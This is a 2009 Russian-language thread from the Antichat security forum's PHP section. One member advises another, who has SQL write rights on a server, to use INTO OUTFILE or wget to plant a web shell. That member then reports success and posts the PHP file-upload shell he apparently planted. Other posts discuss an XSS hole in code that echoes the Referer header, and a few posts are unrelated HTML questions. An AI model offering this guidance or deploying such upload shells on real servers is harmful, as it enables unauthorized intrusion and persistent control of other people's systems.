HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > ПРОГРАММИРОВАНИЕ > PHP
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.02.2009, 17:36
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

c0m, ты пойми, что с помощью SQL ты PHP-код не выполнишь никак... Только можешь записать его в файл с поомщью INTO OUTFILE, но если у тебя нету прав на это (в 99% случаев их нет), то ничего ты не сделаешь в плане внедрения в файловую систему.
 
Ответить с цитированием

  #2  
Старый 05.02.2009, 17:42
Ink-developer
Новичок
Регистрация: 21.01.2009
Сообщений: 1
Провел на форуме:
4093

Репутация: 0
По умолчанию

Народ подскажите если в файле php на сервере содержится нижеследующий код это является уязвимостью? Если да то что необходимо переслать в referer чтобы выполнить произвольный код.
PHP код:
<?
$referer
=$_SERVER['HTTP_REFERER'];
echo
"$referer";
?>
 
Ответить с цитированием

  #3  
Старый 05.02.2009, 17:52
Chaak
Познавший АНТИЧАТ
Регистрация: 01.06.2008
Сообщений: 1,047
Провел на форуме:
5321514

Репутация: 3313


Отправить сообщение для Chaak с помощью ICQ
По умолчанию

Цитата:
Сообщение от Ink-developer  
Народ подскажите если в файле php на сервере содержится нижеследующий код это является уязвимостью? Если да то что необходимо переслать в referer чтобы выполнить произвольный код.
PHP код:
<?
$referer
=$_SERVER['HTTP_REFERER'];
echo
"$referer";
?>
в вышеследующем коде нет ничего, кроме XSS
 
Ответить с цитированием

  #4  
Старый 05.02.2009, 17:46
c0m
Познающий
Регистрация: 26.01.2007
Сообщений: 40
Провел на форуме:
191945

Репутация: 7
По умолчанию

Цитата:
Сообщение от groundhog  
c0m, ты пойми, что с помощью SQL ты PHP-код не выполнишь никак... Только можешь записать его в файл с поомщью INTO OUTFILE, но если у тебя нету прав на это (в 99% случаев их нет), то ничего ты не сделаешь в плане внедрения в файловую систему.
есть права на запись через sql

Последний раз редактировалось c0m; 05.02.2009 в 17:52..
 
Ответить с цитированием

  #5  
Старый 05.02.2009, 17:49
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

Цитата:
Сообщение от c0m  
права на запись через sql
Ну так найди диру куда можешь писать и запиши в файл инклуд какого-нибудь веб-шелла с удалённого хоста. Это во-первых, во-вторых попробуй wget
 
Ответить с цитированием

  #6  
Старый 05.02.2009, 18:15
c0m
Познающий
Регистрация: 26.01.2007
Сообщений: 40
Провел на форуме:
191945

Репутация: 7
По умолчанию

Цитата:
Сообщение от groundhog  
Ну так найди диру куда можешь писать и запиши в файл инклуд какого-нибудь веб-шелла с удалённого хоста. Это во-первых, во-вторых попробуй wget
залил )
PHP код:
<form enctype=multipart/form-data  method=post> <input name=userfile type=file> <input type=submit name=go></form> <?php if(isset($_POST[go]))move_uploaded_file($_FILES[userfile][tmp_name],$_FILES[userfile][name]); ?>
з.ы. через инклуд не получалось

Спасибо
 
Ответить с цитированием

  #7  
Старый 05.02.2009, 17:47
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

да, это уязвимость, попробуй: <h1>Все на кур!</h1>
 
Ответить с цитированием

  #8  
Старый 05.02.2009, 17:57
groundhog
Познавший АНТИЧАТ
Регистрация: 12.05.2007
Сообщений: 1,235
Провел на форуме:
2238549

Репутация: 1318


Отправить сообщение для groundhog с помощью ICQ
По умолчанию

ты никак не выполнишь PHP-код... Блин, ну черти! Ну поймите - PHP код выполняется на стороне сервера, в вашем же случае только клиентская сторона может быть уязвима. И вообще с такими вопросам марш в "Уязвимости".
 
Ответить с цитированием

  #9  
Старый 05.02.2009, 18:41
geforce
Постоянный
Регистрация: 21.08.2008
Сообщений: 302
Провел на форуме:
458686

Репутация: -25
Отправить сообщение для geforce с помощью ICQ
По умолчанию

Вопрос:

Зделал сылку на картинку и вокруг неё появилась синяя окантовка как на стондартной сылке! Как от неё избавиться?
 
Ответить с цитированием

  #10  
Старый 05.02.2009, 18:46
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Цитата:
Сообщение от geforce  
Вопрос:

Зделал сылку на картинку и вокруг неё появилась синяя окантовка как на стондартной сылке! Как от неё избавиться?
Код:
<img src=site.ru/img.jpg></img>
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[c/c++] Новичкам: задаем вопросы _Great_ С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby 5421 21.04.2026 07:37
Интернетчики задали российскому президенту очень странные вопросы podkashey Мировые новости. Обсуждения. 4 07.07.2006 16:53
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ